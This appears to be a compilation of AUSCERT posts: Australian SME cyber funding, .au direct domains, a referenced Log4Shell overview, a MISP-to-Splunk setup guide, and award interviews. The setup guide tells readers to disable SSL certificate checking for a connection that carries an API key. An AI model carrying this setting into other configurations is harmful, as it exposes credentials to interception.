BDO and AUSCERT say the federal government’s technology investment boost is a good first step to heighten the resilience of Australian businesses. However, there is a need for business guidance to avoid another ‘pink batts’ fiasco. The emergence of questionable ‘pop-up’ providers is a reality, say the industry experts. On 29 March 2022, as part of the 2022–23 Budget, the Australian Government announced it will support small business via the Small Business Technology Investment Boost and Small Business Skills and Training Boost. Small businesses with annual turnover of less than $50 million will be able to deduct 120% of eligible training and assets, such as cyber security systems or subscriptions to cloud-based services, in their 2022–23 tax return. AUSCERT and BDO are calling for guidance to be provided for SME’s looking to take advantage of the government incentives to mitigate the chance of inadequate governance. “AUSCERT recognises the significance of the latest federal government announcement and hope the promise will be matched equally by delivery,” said AUSCERT Director David Stockdale. “While it is easy for a government in the runup to an election to make promises, the true benefit is in recognising the needs of SME’s and then delivering the training that will lift the cyber security posture of these organisations. This is a huge task, and with additional pressures on the already stretched Australian Cyber Security Centre to be actively involved with additional critical infrastructure requirements amongst other things, it will fall to the private sector to fill the gap.” “Helping SMEs to understand the threats, assess their own risk landscape and implement proportional controls is critical, and is no easy task. Risk management and cybercrime awareness aren’t the core business of most SMEs, and history has shown that even large corporates can fall victim to wide scale breaches if inadequate governance is in place over contractors such as managed Cyber Security Operations Centres,” noted David. “Training, and regulation of the training, needs to address these knowledge gaps – let’s hope we do not see providers pedalling a “silver bullet” course and we find ourselves looking back and see another ‘pink batts’ fiasco.” The latest BDO and AUSCERT Cyber Security Survey found incidents requiring data recovery efforts also rose by 160% from 2020, suggesting that cyber attacks are becoming more destructive and laser focused. BDO Partner and National Cyber Security Leader Leon Fouche said, “The technology investment boost is a great first step to heighten the resilience of Australian businesses. However, the government announcements to help drive training creates a ripe environment for ineffective training and providers to pop up.” The BDO and AUSCERT survey found that 2021 saw a staggering 175% increase for data breaches caused by accidental emails, such as ‘CC’ing’ instead of ‘BCC’ing’, indicating that staff security awareness training may not be as robust as needed in the wake of remote working arrangements “With the steady increase in working remotely driven by the pandemic there is growing awareness of the need for training,” said Leon. “Indeed, our report showed that 1 in 4 organisations have invested in some form cyber awareness training. Yet most organisations don’t have a chief security officer, or specialist security contractor on speed dial to keep up with the rapidly changing landscape of cyber threats, so the government will need to be able to provide SME’s with a starting point and ongoing support to really help these incentives be impactful.” The BDO and AUSCERT Cyber Security Survey found that 60% of organisations use some form of cyber threat intelligence, meaning those who are not continually learning about new cyber threats are lagging behind their peers. The survey identified several steps business can take to significantly lessen cyber incidents, including onboarding Security Operations Centres, implementing Cyber Awareness Training, undertaking Supply Chain Risk Assessments, and creating Cyber Incident Response Plans. “No doubt the incentives announced by the government will drive SMEs signing on to training and purchasing assets,” commented Leon. “Whether this means a business’s first training course for their staff or upskilling of those employees who already have some awareness training. What is key is guidance on how business can best invest so their efforts are most effective, including avoiding investment in poor training or assets.” BDO forensic expert Stan Gallo said, “Rather than just handing money to the SME owners and leaving them to it, an alternative approach might be to first guide them to where they can discuss the possibilities and get advice on technology investment that can take their business to the next level. There is a lot more to digital evolution than a flashy website or a cloud subscription and throwing money at SME business. Stan noted that the Technology Investment Boost will be a great opportunity to enhance cybersecurity, but hardly revolutionary. “The Technology Investment Boost is terrific for innovative tech driven start-ups and entrepreneurial business, but mature SME’s looking to grow still need to understand the basics of how technology can enhance their business, in addition to standard backend operations. Many people that have laboured over the years and built up a successful business, particularly in traditionally non technology driven areas, still need assistance to understand technology investment and how it can add value to their business operations.” “There is an increased risk the money will be spent on standard IT support and lacklustre training provided by questionable ‘pop-up’ providers,” cautioned Stan. “The types of threats we are seeing continue to evolve in line with current events and technologies, but at their core, there remain many similarities. Phishing, ransomware encryption, business email compromise and data theft are still ever present,” noted Stan. “However, there has been some insidious countermovement. For example, on the back of a growing trend of heightened preparedness and recoverability, thereby denying ransom payments, the ‘standard’ ransomware attack is now regularly linked to an initial theft of data to provide two bites at the cherry. If the victim is not going to pay the ransom – then maybe, they will pay to get their confidential data back. As usual there are no guarantees either way.” You can view a copy of the BDO and AUSCERT Cyber Security Survey at the following link: Cyber Survey Report 2021

From 24 March 2022, the Australian Domain Administration (auDA) will be introducing a new option for Australian internet users with the availability of .au direct domain names. The shorter and simpler domain names (such as pavlova.au, station.au and so on) will be open to individuals and organisations that wish to have an online presence, new or existing, with the proviso that they have a verified connection to Australia. Whilst offering convenience for businesses and individuals, it also presents an opportunity for cybercriminals to create malicious domains. At AUSCERT, it’s our purpose to understand just what those threats might be to provide our members with an analysis of the situation. While it is impossible to completely prevent all kinds of domain name abuse, the requirements auDA has in place (such as registrants needing to have an ‘Australian presence’) certainly help mitigate against widespread and easy abuse (as is prevalent in many other jurisdictions). auDA has extensive resources available should you wish to learn more, including detailed information regarding registering domain names in .au direct, timelines, domain conflict resolution and so on. In addition, you can contact your preferred domain retailer. However, in brief, some points of note are: auDA continues with its strict rules against .au domains being used in any malicious or illegal activities and will take action against recognised offenders. auDA will provide priority registration to those organisations with existing registered domains to the same name in ‘.au’. For example, here at AUSCERT, we have ‘auscert.org.au’ which gives us priority to register and use ‘auscert.au’. This priority period is for six months from the launch date (24 March 2022) to register the ‘.au’ domain after which, it becomes available to anyone. Essentially, this means you have until 20 September 2022 to register any existing domain names you wish to have the new ‘.au’ version of. An “Australian presence” will be required to register a .au direct domain and essentially requires one of: An ABN A Trademark number Australian identification document (passport, driver’s license, etc.) So, what does this mean for you? Be aware that the .au direct domains are being launched on 24 March 2022. Consider which of your existing domains you may wish to register in .au direct. We encourage all members wishing to undertake this process, to do so within six months to avoid any potential issues arising later. Determine whether there may be any potential conflicts with other domain name registrants and understand the auDA process for resolving the conflicts. Check the auDA website for complete details. Contact your preferred domain retailer to register your new domains. Consider which new (rather than existing) domain names you may wish to register. Be aware that the opening up of a new domain space always provides a potential for the resurgence of domain abuse (such as domain squatting, phishing, etc) and take pre-emptive measures such as domain registration in the new domain space. Please contact the team at AUSCERT if you have any security-related questions relating to the introduction of .au direct domains you believe we can assist with. All other questions concerning, for example, domain registration, conflict resolution and so on are best dealt with by reviewing auDA’s or your retailer’s .au direct resources.

Log4Shell-Logjam Overview Picture credit : Lunasec[1] TLDR; Patch, check your patches work, check logs for attempts and possible compromise.   Log4Shell is a tag used by Lunasec[1] to describe the vulnerability in Apache Log4j2 that was disclosed abruptly by a tweet[2] and a github repo. This sudden announcement alerted security professionals to work in a short time frame to protect systems and avoid other interested parties in discovering, compromising and potentially taking over systems. Security groups alerted through the above were computer emergency response teams, which recognised the impact and came out with early advisories[3][4][5] which are either being updated or are being referenced by newer advisories[6]. The attack surface was of prime concern and security professionals were exchanging ways to detect through various third party search results.  One of the lists of the attack surface that was published early showed that Log4Shell or LogJam would affect a large number of systems[7][8].  Ways to detect affected servers were refined into a script[9][10] and other entities also released tools to detect vulnerable servers through first party scanning[11][12][13].  First party scanning is not of concern but unauthorised second party scanning is. This activity was eventually detected[14], and exploit payloads soon followed[15]. The manner in which the vulnerability was disclosed gave a short time frame for the naming and grading.  This was evident as the PSIRT initial only had release candidates[16][17] which later were checked and reported that both had to be used[18]. The vulnerability was later allocated CVE-2021-44228[19] and carried the PSIRT’s analysis[20][21] of a CVSSv3 base score of a perfect 10.0. (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). Before a full patch was available by the PSIRT[22], mitigations were collated and a vaccine made available[23][24] to provide an easy way to mitigate[24] the unauthorised second party scanning attempts to drop a malicious payload. No doubt there will be more numerous and extensive reports[26][27][28][29][30][31][32][33][34][35] made available by noted security organisations, as well as a plethora of resources listed to help[36][37], but the advice right now is as the TLDR, check your version[38][39], patch, check your patch, check your logs for attempts and possible compromise[40], and take remediation steps if any IoC show up[41][42][43][44][45][46]. In a time span no longer than a week CVE-2021-44228 has gone from proof of concept drop to internet wide scans to carrying crypto-coin miner payloads to no being found to carry ransomware payloads.[47][48] Finally, if your weekend was thought to be hectic as a result of this abrupt disclosure, send some positive thoughts to the three volunteers[49][50] who maintain a piece of code that the internet has come to depend so much on.  These three volunteers have worked very hard getting us a patch as soon as possible.[51] As well, we would like to thank all the contributors that have made this article possible by submitting to us relevant links and articles. [1] Lunasec Advisory https://www.lunasec.io/docs/blog/log4j-zero-day/ [2] Tweeted 0-Day https://twitter.com/P0rZ9/status/1468949890571337731 [3] NZCERT https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/ [4] AUSCERT ASB https://portal.auscert.org.au/bulletins/ASB-2021.0244.2 [5] SingCERT https://www.csa.gov.sg/en/singcert/Alerts/al-2021-070 [6] AUSCERT ESB https://portal.auscert.org.au/bulletins/ESB-2021.4186 [7] Attack Surface https://github.com/YfryTchsGD/Log4jAttackSurface [8] Randori Blog https://www.randori.com/blog/cve-2021-44228/ [9] log4j_rce_check https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 [10] Log4j2Scan https://github.com/whwlsfb/Log4j2Scan [11] Qualys Detection https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell [12] SocPrime https://socprime.com/blog/cve-2021-44228-detection-notorious-zero-day-in-log4j-java-library/ [13] Imperva https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/ [14] Log4j RCE Attempts https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217 [15] Cloudflare Blog https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/ [16] PSIRT rc1 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1 [17] PSIRT rc2 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2 [18] CyberKendra https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html [19] NVDB https://nvd.nist.gov/vuln/detail/CVE-2021-44228 [20] RecordedMedia https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/ [21] PSIRT Advisory https://logging.apache.org/log4j/2.x/security.html [22] PSIRT Download https://logging.apache.org/log4j/2.x/download.html [23] Cybereason Blog https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228 [24] Cyberreason Vax https://github.com/Cybereason/Logout4Shell [25] DarkReading https://www.darkreading.com/dr-tech/what-to-do-while-waiting-for-the-log4ju-updates [26] PaloAlto https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/ [27] Cloudflare Blog https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/ [28] Cloudflare Blog https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/ [29] Sygnia Advisory https://blog.sygnia.co/log4shell-remote-code-execution-advisory [30] ISC SANS Diary https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/ [31] ISC SANS Diary https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/ [32] Crowdstrike https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/ [33] Bleeping Computer https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/ [34] Trusted Sec https://www.trustedsec.com/blog/log4j-playbook/ [35] Bleeping Computer https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/ [36] Reddit List of resources on log4j  https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/ [37] CVE-2021-44228-Log4Shell-Hashes  https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes [38] NCSC-NL https://github.com/NCSC-NL/log4shell [39] BlueTeam CheatSheet https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 [40] Log4ShellDetector  https://github.com/Neo23x0/log4shell-detector [41] Bazaar https://bazaar.abuse.ch/browse/tag/log4j [42] URLHaus https://urlhaus.abuse.ch/browse/tag/log4j [43] Threatfox https://threatfox.abuse.ch/browse/tag/log4j [44] CuratedIntel https://github.com/curated-intel/Log4Shell-IOCs [45] Microsoft Guidance https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ [46] TryHackme https://tryhackme.com/room/solar [47] Twitter https://twitter.com/80vul/status/1470272820571963392?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Etweet [48] Twitter https://twitter.com/ankit_anubhav/status/1470648109625536515 [49] Twitter “@FiloSottile” https://twitter.com/FiloSottile/status/1469441487175880711 [50] Twitter “@matthew_d_green” https://twitter.com/matthew_d_green/status/1469715416549367812 [51] ITNews https://www.itnews.com.au/news/log4js-project-sponsorship-skyrockets-after-critical-bug-exploitation-573914

Setting up MISP as a threat information source for Splunk Enterprise By Nicholas Soysa, AUSCERT Disclaimer: The following information is only relevant to AUSCERT members who are formally part of the CAUDIT-ISAC or AUSCERT-ISAC. For more info on this optional add-on service, please refer to the following page   1. Get a license or free trial account. If you’re an existing Splunk customer, then you should already have the credentials to access Splunk. If you’re keen on trying out first, you can obtain a limited free trial account at https://www.splunk.com/en_us/download.html.   2. Install and run Splunk Enterprise. Download the appropriate installer for your platform (32- or 64-bit)  and follow the installation steps. Launch the Splunk Enterprise search head Log into your Splunk Administrator account   IMPORTANT: MISP42Splunk 4.3.0 has been merged to the master branch. The information in section 3 is no longer relevant. You can now update misp42splunk using the “Upgrade App” (exisitng app) or “Install” option (fresh installs), as usual.   3. Install and setup MISP42Splunk MISP42Splunk 2.2.0 is not currently in the master branch. NOTE: Once the update’s been merged to the master branch, Until then, download the file from the github repo at: https://github.com/remg427/misp42splunk/tree/2.2.0 Extract the ZIP archive. Convert the folder “misp42splunk” to TAR.GZ format using a utility like 7-zip or the command line. Return to the Splunk app and navigate to “Apps” Select the “Install App from file” option Select the archive misp42splunk.tar.gz which you created and click Upload Restart Splunk when prompted   4. Add MISP instance Create a MISP instance name. For example: “AUSCERTMISP” MISP URL = Base URL of the MISP instance (e.g. https://misp-c.auscert.org.au OR https://misp.auscert.org.au) For the “Set the MISP auth key” enter a valid API key for a MISP user which has “authkey access privileges. This is typically any user with “User” up to “Org admin” roles. Untick the “Check SSL certificate of MISP server” box. We no longer require client certificate to authenticate. Untick the “Use a client certificate” if ticked. Press “Save”. Once the save is completed, you will be returned to the Apps page.   5. Check it works Navigate to the MISP42 apps (Apps dropdown -> MISP42) In the MISP42 app page, select Reports Then select, for example, mispgetioc misp_instance=AUSCERTMISP last=1d If the app works, then you should see Attributes from MISP event returned in the report It is suggested to store the feeds in an index which can be then queried in future if needed.     6. Resources        CAUDIT-ISAC users can access the PDF version at: https://wordpress-admin.auscert.org.au/publications/2018-08-22-misp-integration (Member portal login required) AUSCERT-ISAC users can access the document at: https://wordpress-admin.auscert.org.au/publications/2019-03-04-misp-integration (Member portal login required)   7. Credits       Thanks to Remi Seguy (author of misp24splunk) for promptly implementing this feature request.  

APCERT CYBER DRILL 2021 The progression toward a growing reliance on the e-economy within the Asia Pacific region requires ongoing protection of the various infrastructures, integral to the political and economic stability and security. The Asia Pacific Computer Emergency Response Team (APCERT) recently conducted its annual drill, a means of maintaining and improving awareness and skills within the cyber security community through this collaborative undertaking. This year’s theme, “Supply Chain Attack Through Spear-Phishing – Beware of Working from Home”, reflects real-world incidents and issues, experienced globally. As a founding member, AUSCERT has participated in every drill since their inception with Operations Manager, Geoff Thonon stating that the drill is “More important than ever”. “Whilst there is a time limit, the purpose of the drill isn’t to identify the fastest (CERT) team but rather, to work collaboratively to challenge and develop everyone’s skills”, Geoff continued. The experiences and tasks conducted by each participating team allows for knowledge sharing with no CERT typically experiencing the same issues or providing like for like services. The APCERT drill aims to maintain and progress internet security and safety with the exercise providing participants the chance to improve communication protocols, technical responses and the overall quality of incident responses. Although undertaken in a few hours, the lessons learned from the experience can continue long after. Analysing the challenges, choices and responses of teams provides an insight into the various perspectives of other participants. “The information available to each team from the drill provides a greater understanding of the how and why that can lead to year-round training and development for staff”, Geoff stated. With 26 CERTs from 20 economies within the Asia Pacific region taking part, there is a wealth of knowledge and experience to draw upon in the quest for ongoing learning and growth within the sector. As each drill typically requires six to eight months of planning and preparation, the 2022 APCERT Cyber Drill will soon be underway – the ongoing need for education and skill enhancement a reflection of the rapid development of the digital world we now reside in! 

Using threat intelligence to produce a cyber defence strategy Very few practitioners need to be told of contemporary cyber threats such as ransomware, it has found its way into the common language of risk assessments, disaster recovery plans and mainstream media alike. But what can be done other than writing playbooks and practicing response plans, following the Essential 8 and blocking known malicious indicators? Those organisations with a strategic approach to cyber defence will more likely survive a ransomware attack, and consideration of an attacker’s motive may be key towards mounting a successful defence. For example, if the motive is purely financial and the attacker causes significant business disruption if the ransom demand is not met, what controls can prevent this? However, if the motive is to hold to ransom the intellectual property, customer database or another information asset, should priority instead be given to controls which detect and mitigate data exfiltration? Whilst senior management’s risk tolerance level may be “we must implement all possible countermeasures,” few organisations will have the luxury of doing so. Utilising available data sets to form operational “cyber threat intelligence” can help mitigate harmful events such as ransomware attacks. Most importantly, to do so is within the reach of most organisations following the explosion of available open-source tools and data sets. Such “tactical” cyber threat intelligence usually consists of Indicators of Compromise (IoCs) – technical data such as known bad IP addresses, URLs, emails and file hashes. Here is where the value proposition of CERTs (Cyber Emergency Response Teams) pays off: not-for-profit organisations providing open source and member-funded services, passionate teams consisting of analyst, dev-ops and engagement functions, CERTs are trustworthy due to their independent status. CIRCL from Luxembourg famously produce the Malware Information Sharing Platform (MISP) and tactical data feeds, used worldwide by other CERTs including AUSCERT, governments and private enterprise. Many organisations do not have resources beyond the tactical level, however simply using tactical feeds of IoCs has shown to be effective detecting or even preventing the initial stages of a ransomware attack. Relevant and concise IoCs may be used in content filters, centralised logging, SIEM or even custom-scripted solutions to hunt or block threats. AUSCERT’s Malicious URL Feed is an example of a high-confidence, low-volume feed, usually consumed in an automated fashion but also suitable for manual threat hunting, depending upon the consumer’s available resources. Members of AUSCERT’s MISP community can study operational intelligence such as attackers’ tools, techniques and procedures, even visually. A “mind map” connects similar events and data, allowing members to correlate campaigns and understand the techniques used in incidents such as ransomware attacks, for example. Organisations can then form strategic plans regarding the risks associated with cyber threats. Most importantly of all, a collaborative approach must be foremost in discussions regarding cyber defence strategy. A common misconception is that sharing threat information may compromise competitive advantage, however a particular strength of CERTs is coordinating, anonymising and analysing incident data, and then providing operational intelligence to members – even entire sectors. Have you included your local CERT in your IR (Incident Response) plans? Mike HolmSenior Manager, AUSCERT

AUSCERT2021 Information Security Excellence Winner [A copy of this interview article is also featured on Edition 3 of the Women in Security Magazine, published by Source2Create.] Jacqui is Founder and Executive Manager of the Australian Women in Security Network (AWSN) which aims to connect, support and inspire more people, in particular, women and female-identifying professionals to pursue a career in security. She is also co-author of the international book ‘Women in the security profession’. In April 2021, Jacqui decided to take a leap of faith and is now devoting 100% of her time to building the AWSN as a not-for-profit organisation. In short, AWSN has been Jacqui’s “passion project” for close to 7 years. Today, AWSN is a national group of close to 2,500 members across Australia with linkages to a number of prominent sponsors. It is an open network of people aiming to grow the number of women and female-identifying professionals in the cyber security community. AWSN’s mission is to support, inspire, and connect women and female-identifying professionals in the industry and those looking to enter the field with the tools, knowledge, a connected network and platforms they’ll need in order to build their confidence and cultivate their interest. Kudos to Jacqui for her tireless work in building the AWSN to where it is today, and with that – it is with great honour that we award her the Winner of Information Security Excellence in 2021.  Tell us a little about your professional career? My interest in technology started off when I worked at a help desk at Australia Post and in the area of  PC support at an insolvency company during uni where I studied a Bachelor of Information Systems. I then graduated and became a unix adminstrator for a few years before then deciding that I wanted to see and travel the world! When I was back-packing in Europe I ran out of money (as you do!) and got a job working on the helpdesk at Schlumberger. I got the opportunity to retrain to be a technical consultant. They put me through some really intensive technical networking and security training and at the end they asked what I wanted to do. I thought security was interesting, and this is pretty much how my security career journey began! I then worked as a security consultant for multiple large scale projects where I’d worked on a variety of different areas such as implementing AV, PKI solutions, performing risk assessments and technical assessments, policy-writing, and basically anything that was thrown at me at the time. I ended up spending 7 years in London and 7 years in Paris as a consultant working on many interesting projects which I loved. When I came back to Australia, I continued to consult on different projects before then moving to the in-house security team at ANZ. I started in their Identity and Access Management (IAM) team, then moved on to designing the cybercrime controls for ANZ’s institutional banking arm; and finally moved to head the Security Education and Influence team in a job share role. I then decided that I really wanted to help small businesses who I saw being affected by cybercrime and ended up spending a year in start-up land with the folks at Cynch Security. You’re the founder of AWSN. Can you tell us more about how AWSN was born and what your mission is? The idea of the AWSN (Australian Women in Security Network) was born when I returned from a 14-year stint overseas and came back to Melbourne. I walked into a security event and was overwhelmed by being the only female in the room. It was something I had gotten used to in Europe; but it really hit me when I came back to my home country to see and experience  it, especially when I didn’t know anyone in the room. I’d met one other female participant and she took me under her wing and introduced me to some people. We then brought together a number of female colleagues for casual breakfasts and met up before the start of security conferences. We spoke about how much we enjoyed working in security and some talked about the challenges they faced with being the only females in their teams. After a while, I was thinking that there may be other women out there also feeling alone, so I started a LinkedIn group. This then grew organically over time and soon local state-based chapters started to pop up across Australia. These then grew into more formal events and now our community consists of around 2500 people. The AWSN is an open network of people aiming to grow the number of women in the security community. We support, inspire, and act as role models. We connect women in the industry and those looking to enter the field with the tools, knowledge, network and platforms needed to build confidence and interest. As a network, we know the diversity of online threats require diversity of thought on how to address them, and this is where our network thrives.We do this mainly through events, hand-on workshops, training, mentoring and speaking engagements through community groups, universities and high schools. Congratulations on winning the Information Security Excellence award! What does winning this award mean to you? It was an absolute honour to have received this award. This means so very much to me and I sometimes still pinch myself with disbelief! I believe that this is a community recognition award, as the AWSN couldn’t have got to where it is today without all the volunteers, sponsors, donors, mentors, coaches, speakers, writers and all the people supporting us over the years. Receiving this award means that the Information Security industry in Australia recognises that what the AWSN is doing is important and meaningful work AND that we are on the right track with what we are trying to achieve. It means that all the hard work and hours that myself and all our volunteers put in to make AWSN what it is today is worth it! Thank you to everyone who has contributed to our cause, you know who you are. What do you see as some of the main cyber threats in today’s society and their accompanying risks? Are you seeing any trends of particular threats becoming more common? Good question! There are many and I could probably talk for hours on this topic. But if I were to choose two, which I think we as a society/community need to work together on a lot more are application vulnerabilities and supply chain risks. As we continue to use technology and build systems, apps, software faster than ever – often security is something that is considered at the last minute or sometimes, never! We shouldn’t expect the users of our systems or apps to know what to look out for when it comes to a security breach. Hence, it is my personal belief that technology should really adopt a “secure-by-design” philosophy and make it easy for users to apply security updates when they are required. When it comes to the topic of supply chain risk, some of these cyber threat issues stem from the fact that small businesses (which btw, constitutes 98% of all Australian businesses**) often cannot afford security consultants to help them with implementing secure processes or expensive security services and products to protect their company assets. These businesses are particularly vulnerable to threats such as business email compromise (BEC), ransomware or data breaches which are increasingly becoming more and more common. These can have downstream implications on large corporations, critical infrastructure and Government agencies as it is very likely that at some point these smaller businesses are further down in their supply chain. It’s cliche, but cyber security really IS in everyone’s interest – no matter the size of your workplace. ** figure obtained from the Australian Small Business and Family Enterprise Ombudsman (ASBFEO) If you could give one piece of advice for organisations and IT/cyber security professionals, what would that be? To stay humble and keep an open mind. Remember and realise that most of our society don’t know what we know, and that no question should be considered a silly question. I don’t think that there is anyone in our sector who knows absolutely everything about security, so we shouldn’t treat/blame users like they should have known better in case of a breach or an incident. There are many people out there (they could be your grandparents, friends, family members  and colleagues) who are confused and overwhelmed by what they know and what they don’t know about the topic of cyber security. It is this stigma that cyber security is difficult and tricky which often makes many security departments feared or are perceived to be unapproachable. We, as a community therefore all have a responsibility to show them that we are keen to help them learn and have them join us on this journey. We cannot fight this battle with just technology and largely rely on humans to report things that are suspicious, to consult with us before they are about to go live with a system and to sign off on our budgets. Therefore, we need everyone on our side and we need to show that we are open to listen and help.  As a community, I think we need to communicate better, prioritise (based on known risks) and provide them with easy and accessible information, solutions and advice – so as not to confuse the general public further. What’s one common challenge you find women and female-identifying professionals are facing in the cybersecurity industry and how can organisations continue to support them? A common challenge I’ve personally found with women and female-identifying professionals in male-dominated teams is that they feel they are not heard or given the same opportunities as their male counterparts. They are often questioned why they are there and instead of asking or referring to them as subject matter experts, they are sometimes asked to be referred to a male counterpart as it’s assumed they don’t know the answer or have anything to contribute to a particular security topic. Everyone should be given an equal opportunity to contribute, and by this I don’t mean just females, but also young/elderly males, people of different ethnicities, people of different backgrounds who need a voice. Organisations must address this better, it needs to be a fundamental yet important goal within all teams or we will continue to lose good talent! And when good talent is lost, it makes it hard for upcoming new talent to see people like themselves in a career path in security, and we absolutely need this new talent in order to fight the new security and technology challenges ahead.  

AUSCERT2021 Diversity and Inclusion Champion This year, to mark the occasion of AUSCERT’s 20th annual conference anniversary, the team has decided to introduce a new award category – the AUSCERT Diversity & Inclusion Champion.  At AUSCERT, we believe that Diversity & Inclusion champions are leaders who take responsibility for instilling a diverse and inclusive workplace culture. According to the Diversity Council of Australia, the definition of a Diversity & Inclusion champion is someone who plays both a symbolic and an active strategic role. Their symbolic function is to demonstrate leadership support for diversity and inclusion by attending diversity events and delivering diversity messages to stakeholder groups within the company and externally. They contribute to diversity strategy development and implementation by serving on diversity councils, campaigning for support from their fellow colleagues, and consulting with diversity leaders. Pip Jenkinson, CEO and Co-Founder of Baidam Solutions is the inaugural winner of this AUSCERT award. For those unfamiliar with Pip, his work at Baidam emphasises the importance of partnerships with some of Australia’s largest employers to create job opportunities and funding for cybersecurity certification training. Baidam gives a significant percentage of the company’s profits to providing pathways to employment in the IT sector for Indigenous and First Nations people. Pip’s and Baidam’s journey is an inspiring story and shows a great example of how organisations can combine profit with social good. It is with great honour that we award Pip with the inaugural AUSCERT Diversity & Inclusion Champion award. Tell us a little about your professional career? I have had a very diverse career and my pathway to a career in cyber security certainly  wasn’t a straight line. Growing up on a farm in Bathurst NSW, I have worked in shearing sheds, at building sites; and I have also served in the Army. I then decided to enrol at university as a mature age student in a Business degree. My first “real” job outside of university was a sales representative for Guinness in Dublin, Ireland and I was fortunate to travel around the United Kingdom, working in some pretty amazing places. I returned to Australia and stayed within the wine trade, working (and tasting) some of Australia’s best wines and meeting some extraordinary people who were producing wine at an award-winning International standard. These folks were all working really hard to cement the image of Australia as a producer of wine that would rival some of the most famous International brands. One day, out of the blue I decided to apply for a role in ICT sales, working for a large cyber security vendor. When I was shortlisted for an interview, I was so nervous about meeting my potential line manager because I didn’t know much about the sector but I gave it my best shot. There were 4 interview rounds in total and there were many other competitive applicants with greater experience than myself, but when I was offered the role, it was life changing for me! This in turn motivated me to ask for some feedback and I was promptly told that I was hired based on attitude, not aptitude. I was motivated to learn as much as I could and certainly made mistakes along the way – but I was so grateful for the opportunity to improve, to earn a good wage and to alway remember where my start in the cyber security industry came from; and hopefully one day, being able to repay this gesture and opportunity. Can you tell us more about your work at Baidam? At a macro level, Baidam Solutions is an Indigenous owned enterprise. Baidam is a supplier of cyber security goods and services to State and Federal governments and ASX-listed corporations. We model our offerings around the ASD “Essential Eight.” At a micro level, we have created a pretty special business model that directly links a social outcome to a commercial drive. From the profits retained within our supply-chain and it in itself being free from any Government assistance or subsidy, we have been able to support two lifetime University based scholarships for Indigenous students in the STEM fields; as well as numerous industry recognised certifications. The recipients of these scholarships are now working within various SOC teams across Australia. I am incredibly fortunate to work in a team that all share a single company vision and company mission – “To increase Indingeous diversity and inclusion in the ICT sector by using education as a vehicle to build technical equity in our First Nations cyber security aspirants.” Congratulations on winning the Diversity and Inclusion Champion award! What does winning this award mean to you? I was absolutely humbled and quite frankly, speechless to win the award! I received the award on behalf of the whole team at Badaim Solutions. We all know that cyber security is a team sport and there is a great team that stands beside me. The award was really special, being the first at anything is hard, but also rewarding. We are the first Supply Nations certified cyber security practice headquartered in Queensland. Therefore, it is our job to help other Indigenous security professionals get a foothold in the industry and it is our job to lead by example,in everything we do. To be the recipient of the inaugural AUSCERT Diversity and Inclusion Champion award is a huge honour and one that must be given the respect that it deserves, to continually uphold the principles of Diversity and Inclusion and be a role model for others to follow.  What recommendations would you give to other organisations looking to provide pathways for employment in the IT sector for Indigenous and First Nations peoples? Do your research. Be committed and do it for the RIGHT reasons. Invest in cultural immersion programs to lift the knowledge of the entire organisation, don’t leave everything to the folks from Human Resources. Obtain advice and understand that there are many cultural events that don’t neatly sit inside within a standard Fair Work Act 2009 employment contract. Be sensitive and flexible and if you do a good job, the results will speak for itself, you will enjoy a richer, more diverse and inclusive employee talent pool that is more representative of the community that you operate in. Baidam’s journey is an inspiring story and a great example of how organisations can combine profit with social good. What advice would you have for organisations looking to do this? Well, this one is very simple. Just do more and do it more often! We are showing other organisations what is possible when focused on sustainable, social return on investment (SROI) rather than purely ROI. Whether you are looking to support Women’s businesses, Veterans businesses, LGBTIQ+ businesses, Australian Disability Enterprises or a myriad of other social  businesses,find a reason to do business other than the pursuit of profit! Draw a line in the sand today, not tomorrow and stand for something other than profit, your customers will appreciate it and so will your staff. Finally, what do you think are the main challenges and opportunities for the cyber security industry in the coming years? Like my past experience in the wine trade industry, Australia has the opportunity to be recognised as a global leader in the production of cyber security talent as well as sovereign cyber security solution capabilities – truly! As a community, we need to do more to support the local companies who are helping this flourishing marketplace. So where possible, buy local, support local and invest locally. I think the Australian Government is doing a good job in supporting this idea, but as with most things, greater work needs to be done. The challenges in our sector are well documented and includes amongst others; a skills shortage and a culture of sourcing projects off-shore. The final challenge, directly linked to the Indigenous cultures that Baidam represents (one that we all need to overcome!) is a mental one …  We MUST change our thoughts from “Why would I buy through an Indingeous business?” to “Why wouldn’t I buy from an Indigenous business?” To sum it up for me, I’d like to share this Norman Vincent Peale quote, “Change your thoughts and you can change your world”.                          

